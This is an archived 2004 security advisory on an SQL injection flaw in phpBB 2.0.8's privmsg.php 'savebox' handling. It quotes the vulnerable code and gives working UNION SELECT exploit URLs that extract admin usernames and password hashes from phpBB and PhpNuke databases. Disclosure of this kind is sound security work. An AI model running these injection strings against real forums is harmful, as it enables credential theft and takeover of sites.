Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: hack2651.htm

phpBB 2.0.8 - Critical sql injection bug



[waraxe-2004-SA#013 - Critical sql injection bug in PhpBB 2.0.8 and in older versions]







{================================================================================}

{                              [waraxe-2004-SA#013]                              }

{================================================================================}

{                                                                                }

{      [ Critical sql injection bug in PhpBB 2.0.8 and in older versions ]       }

{                                                                                }

{================================================================================}

                                                                                                                                

Author: Janek Vind "waraxe"

Date: 26. March 2004

Location: Estonia, Tartu







Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





PhpBB is widely used and very popular forum software, written in php.

Homepage:  http://www.phpbb.com/ 







Vulnerabilities:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



PhpBB 2.0.x is written very carefully and securely. But even there can be bugs, which

will give to potential malicious attacker sensitive information from database - admin's

username and password's md5 hash.



So, let's look at original code from privmsg.php line 189:





*************************************************************************************



	// SQL to pull appropriate message, prevents nosey people

	// reading other peoples messages ... hopefully!

	//

	switch( $folder )

	{

		case 'inbox':

			$l_box_name = $lang['Inbox'];

			$pm_sql_user = "AND pm.privmsgs_to_userid = " . $userdata['user_id'] . " 

				AND ( pm.privmsgs_type = " . PRIVMSGS_READ_MAIL . " 

					OR pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . " 

					OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )";

			break;

		case 'outbox':

			$l_box_name = $lang['Outbox'];

			$pm_sql_user = "AND pm.privmsgs_from_userid =  " . $userdata['user_id'] . " 

				AND ( pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . "

					OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " ) ";

			break;

		case 'sentbox':

			$l_box_name = $lang['Sentbox'];

			$pm_sql_user = "AND pm.privmsgs_from_userid =  " . $userdata['user_id'] . " 

				AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL;

			break;

		case 'savebox':

			$l_box_name = $lang['Savebox'];

			$pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "

					AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " ) 

				OR ( pm.privmsgs_from_userid = " . $userdata['user_id'] . "

					AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " ) 

				)";

			break;

		default:

			message_die(GENERAL_ERROR, $lang['No_such_folder']);

			break;

	}



	//

	// Major query obtains the message ...

	//

	$sql = "SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text

		FROM " . PRIVMSGS_TABLE . " pm, " . PRIVMSGS_TEXT_TABLE . " pmt, " . USERS_TABLE . " u, " . USERS_TABLE . " u2 

		WHERE pm.privmsgs_id = $privmsgs_id

			AND pmt.privmsgs_text_id = pm.privmsgs_id 

			$pm_sql_user 

			AND u.user_id = pm.privmsgs_from_userid 

			AND u2.user_id = pm.privmsgs_to_userid";



*****************************************************************************



As we can see, for some reason there is "$pm_sql_user .=" in case of 'savebox'. Funny thing is, that

this little bug can open critical security hole to forum. First, let's try this:



http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read &p=99&pm_sql_user=foobar



and we get error message:



General Error 

  

Could not query private message post information



DEBUG MODE



SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'foobarAND ( ( pm.privmsgs_to_userid = 2 AND pm.privmsgs_t



SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id foobarAND ( ( pm.privmsgs_to_userid = 2 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 2 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid



Line : 238

File : D:\apache_wwwroot\phpbb206c\privmsg.php	 



 

Next, if we request this:



http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read &p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/*



then we don't get any error messages. Now it's time to do something "useful":



********************[real-life sploit]********************





http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read &p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*





********************[/real-life sploit]*******************



and we will see in plaintext admin's username and password's md5 hash ;)



And to all PhpNuke 6.x and 7.x users, here is something for you:



http://localhost/nuke69j1/modules.php?name=Private_Messages&file= index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*







Post Scriptum: 



I really enjoy reading of the PhpBB 2.x code, because it is written with good style and it's

very secure. To all php programmers - I recommend to read the file "docs\codingstandards.htm" from

phpbb package, it will help to learn good style of the programming!









Greetings:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



    Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!

Special greets to Stefano from UT Bee Clan!







Contact:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



    come2waraxe@yahoo.com 

    Janek Vind "waraxe"



---------------------------------- [ EOF ] ------------------------------------


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH